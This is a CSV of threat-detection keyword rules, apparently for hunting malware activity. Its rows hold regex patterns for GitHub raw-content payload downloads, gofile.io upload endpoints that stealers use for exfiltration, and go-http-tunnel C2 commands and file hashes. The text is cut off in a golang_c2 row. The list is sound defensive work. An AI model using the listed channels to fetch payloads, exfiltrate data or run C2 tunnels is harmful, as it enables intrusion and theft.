"*raw.githubusercontent.com*.rgs*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.rgs.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.RGS*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.RGS.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.run*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.run.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.scpt*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.scpt.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.script*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.script.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.sct*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.sct.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve 
payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.sh*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.sh.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.ssh*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.ssh.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.sys*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.sys.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.teamserver*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.teamserver.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.temp*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.temp.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" 
"*raw.githubusercontent.com*.tgz*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.tgz.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.tmp*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.tmp.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.vb*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.vb.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.vbs*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.vbs.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.vbscript*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.vbscript.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.ws*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.ws.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve 
payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.wsf*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.wsf.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.wsh*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.wsh.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.X86*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.X86.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.X86_64*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.X86_64.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.xlam*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.xlam.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" 
"*raw.githubusercontent.com*.xlm*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.xlm.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.xlsm*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.xlsm.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.zip*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*.gofile.io/uploadFile*",".{0,1000}\.gofile\.io\/uploadFile.{0,1000}","greyware_tool_keyword","gofile.io","legitimate service abused by lots of stealers to exfiltrate data","T1567.002","TA0010","N/A","N/A","Data Exfiltration","https://gofile.io","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*api.gofile.io/getServer*",".{0,1000}api\.gofile\.io\/getServer.{0,1000}","greyware_tool_keyword","gofile.io","legitimate service abused by lots of stealers to exfiltrate data","T1567.002","TA0010","N/A","N/A","Data Exfiltration","https://gofile.io","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "* tunneld.service*",".{0,1000}\stunneld\.service.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","N/A","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" 
"*/.tunneld/*.key*",".{0,1000}\/\.tunneld\/.{0,1000}\.key.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","N/A","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" "*/go-http-tunnel.git.git*",".{0,1000}\/go\-http\-tunnel\.git\.git.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","1","N/A","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" "*/go-http-tunnel/cmd/*",".{0,1000}\/go\-http\-tunnel\/cmd\/.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","1","N/A","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" "*/tunneld.service*",".{0,1000}\/tunneld\.service.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","1","N/A","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" "*03cbb2a21105c9aae4fb499ad8fb4898d6c87c7d3a3071eae601bdae8bad19ab*",".{0,1000}03cbb2a21105c9aae4fb499ad8fb4898d6c87c7d3a3071eae601bdae8bad19ab.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" "*0a08cac081d32713c5aaa00b04424dcdf2ffcaa7b58620eebc9ee17b5d25ebbf*",".{0,1000}0a08cac081d32713c5aaa00b04424dcdf2ffcaa7b58620eebc9ee17b5d25ebbf.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - 
TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" "*0cba4351414f3da3355bc9ab73052e0d36d6f18e513047650dad956fb6344285*",".{0,1000}0cba4351414f3da3355bc9ab73052e0d36d6f18e513047650dad956fb6344285.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" "*0faad61745a8c559756165ec4bf749c7ee334b815b750dbdc671af2283805739*",".{0,1000}0faad61745a8c559756165ec4bf749c7ee334b815b750dbdc671af2283805739.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" "*1433542e6c771cd59c491558e482ebbc7d40bbaf86190379bb4236067b21d805*",".{0,1000}1433542e6c771cd59c491558e482ebbc7d40bbaf86190379bb4236067b21d805.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" "*14d18d34c262664246cc1eb46dfe1159fce9b5d0b14d6ba013f08d1d55a6eeb6*",".{0,1000}14d18d34c262664246cc1eb46dfe1159fce9b5d0b14d6ba013f08d1d55a6eeb6.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" 
"*2c183c4c53ddb0419f401cf690f16ccbeefc829f09fafca2a19700665c322cbc*",".{0,1000}2c183c4c53ddb0419f401cf690f16ccbeefc829f09fafca2a19700665c322cbc.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" "*341e6c79cb6383b166d0f21f77f88735b340195dce8945bf9ff05a3cda1cb9a0*",".{0,1000}341e6c79cb6383b166d0f21f77f88735b340195dce8945bf9ff05a3cda1cb9a0.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" "*3daf819f691c66a2216bc047349e5d6ed252aa1393c076cce9f68a1a7bed5b76*",".{0,1000}3daf819f691c66a2216bc047349e5d6ed252aa1393c076cce9f68a1a7bed5b76.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" "*4416b23c351acb1ea86eff2f75926ee7fbb78dea66fe2f01e38e9f81683645e9*",".{0,1000}4416b23c351acb1ea86eff2f75926ee7fbb78dea66fe2f01e38e9f81683645e9.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" "*57944ea45f77ef9b4757a95c077b30af638ed72c1399e75356f08cae37a3965f*",".{0,1000}57944ea45f77ef9b4757a95c077b30af638ed72c1399e75356f08cae37a3965f.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - 
TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" "*5c4247c201d5bfb98cd4021c4cf0dd732c4fa47daeb4c70fcb29f7ddfe1b5760*",".{0,1000}5c4247c201d5bfb98cd4021c4cf0dd732c4fa47daeb4c70fcb29f7ddfe1b5760.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" "*616bcf6f1ebc84ce6c2f0469f6c38b08eabef2339dfca03d0782a54ae6cc6024*",".{0,1000}616bcf6f1ebc84ce6c2f0469f6c38b08eabef2339dfca03d0782a54ae6cc6024.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" "*6794102a7b3d61dd4344b555ab684f4140d40da9ec0da36b03cd397f1987bb61*",".{0,1000}6794102a7b3d61dd4344b555ab684f4140d40da9ec0da36b03cd397f1987bb61.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" "*690f31d0d8f473ae1f71a7fbce1e7943d601f6adf2065d22d44162266c88f546*",".{0,1000}690f31d0d8f473ae1f71a7fbce1e7943d601f6adf2065d22d44162266c88f546.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" 
"*7f23ac69fa3f519b324bcc33e56272bf1cc9191980bef960a562099844659a3c*",".{0,1000}7f23ac69fa3f519b324bcc33e56272bf1cc9191980bef960a562099844659a3c.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" "*81317db18f63092007326ae6330d704c17d95ff2dfc65fc1922d0f3708ddee6e*",".{0,1000}81317db18f63092007326ae6330d704c17d95ff2dfc65fc1922d0f3708ddee6e.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" "*873b15cab88f6d288e02bd71e5cefb1edf0b96dc80a8a0d7d404f4b327c68097*",".{0,1000}873b15cab88f6d288e02bd71e5cefb1edf0b96dc80a8a0d7d404f4b327c68097.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" "*8eb3e6b0ac776c819158b0127631f860223f5fe80cc7297d01626252562cb866*",".{0,1000}8eb3e6b0ac776c819158b0127631f860223f5fe80cc7297d01626252562cb866.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" "*8f904a5fd2b5c821121ad0003e3f4021cc5f1c2969d14e64e67ce35721ab6f70*",".{0,1000}8f904a5fd2b5c821121ad0003e3f4021cc5f1c2969d14e64e67ce35721ab6f70.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - 
TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" "*9684712e7ea18e0e82bbdf8b990173349ac97423ab59b0daa265a222cfbef816*",".{0,1000}9684712e7ea18e0e82bbdf8b990173349ac97423ab59b0daa265a222cfbef816.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" "*9dc3c784b09c7e143046fee8b0b96f2b2c92fa95aad96679e0ab79383e20647c*",".{0,1000}9dc3c784b09c7e143046fee8b0b96f2b2c92fa95aad96679e0ab79383e20647c.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" "*a11a44666cbdc5c56112cdb109e37c7f4f466f947500efce2192007d553a07f5*",".{0,1000}a11a44666cbdc5c56112cdb109e37c7f4f466f947500efce2192007d553a07f5.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" "*a5dd833c5c1f9ac79705b4fddd9d9e7dde9b25f5bbf79a7dc1c00537f181f47a*",".{0,1000}a5dd833c5c1f9ac79705b4fddd9d9e7dde9b25f5bbf79a7dc1c00537f181f47a.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" 
"*aacf0692bcac39321f5f427164f6807107ae9bc75404a07d009f553710d9bc55*",".{0,1000}aacf0692bcac39321f5f427164f6807107ae9bc75404a07d009f553710d9bc55.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" "*b3f0715b807f2c31670a389cb430f01423f281d38f44e93d53e5fb2732406173*",".{0,1000}b3f0715b807f2c31670a389cb430f01423f281d38f44e93d53e5fb2732406173.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" "*bb5f01316e315e4a9039a17dd2358cec0a86cac566638d8ce5e2ce0b5ebc1fbf*",".{0,1000}bb5f01316e315e4a9039a17dd2358cec0a86cac566638d8ce5e2ce0b5ebc1fbf.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" "*c6b4e0b176b29a3a2bf68e702195cbf72d705f8c6419ac17e7bfd16b18429447*",".{0,1000}c6b4e0b176b29a3a2bf68e702195cbf72d705f8c6419ac17e7bfd16b18429447.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" "*cbdf3b97f6a72121a00e8f14fd0bbd564aefc6edfde0b9449f1613559678d09f*",".{0,1000}cbdf3b97f6a72121a00e8f14fd0bbd564aefc6edfde0b9449f1613559678d09f.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - 
TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" "*cc3badcfbd2bad09f5a4312eabdc50b2d2259cbac5429deb6e53340468c7b7b0*",".{0,1000}cc3badcfbd2bad09f5a4312eabdc50b2d2259cbac5429deb6e53340468c7b7b0.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" "*cde0f088445933eef88c2663bf2684f6e020d30347a7a230658d534c05f4e8d9*",".{0,1000}cde0f088445933eef88c2663bf2684f6e020d30347a7a230658d534c05f4e8d9.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" "*cf418ac948b21bbed8565d6f11419405aa7b25d3c37b8a2b212e85f6aa76d233*",".{0,1000}cf418ac948b21bbed8565d6f11419405aa7b25d3c37b8a2b212e85f6aa76d233.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" "*d5e79002815d4d904942d07786fab82492f83912d175804e21c059c00efe3d95*",".{0,1000}d5e79002815d4d904942d07786fab82492f83912d175804e21c059c00efe3d95.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" 
"*e7f434888e992b2679e221199354f80eaee1e7c3c546043f37aeefa3fbe252ae*",".{0,1000}e7f434888e992b2679e221199354f80eaee1e7c3c546043f37aeefa3fbe252ae.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" "*edb84e2914bb1bd31a213b87aabd387999159093c5c00138cbc8f8f8fdc77fb1*",".{0,1000}edb84e2914bb1bd31a213b87aabd387999159093c5c00138cbc8f8f8fdc77fb1.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" "*f0ded25a361ea53de7518a357c03d733d8caf206f7a90a8e3b4d6a29563c9277*",".{0,1000}f0ded25a361ea53de7518a357c03d733d8caf206f7a90a8e3b4d6a29563c9277.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" "*f955157646e94bed38b8e4d6ce6df58489eeb89ebf0d44ffe03b3c4902dc5d4e*",".{0,1000}f955157646e94bed38b8e4d6ce6df58489eeb89ebf0d44ffe03b3c4902dc5d4e.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" "*mmatczuk/go-http-tunnel.git*",".{0,1000}mmatczuk\/go\-http\-tunnel\.git.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - 
TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","1","N/A","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" "*tunnel -config *tunnel.yml*",".{0,1000}tunnel\s\-config\s.{0,1000}tunnel\.yml.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","N/A","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" "*tunneld -tlsCrt *",".{0,1000}tunneld\s\-tlsCrt\s.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","N/A","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z" "*http://127.0.0.1:8000/gate.html*",".{0,1000}http\:\/\/127\.0\.0\.1\:8000\/gate\.html.{0,1000}","greyware_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1090","TA0011 - TA0008 - 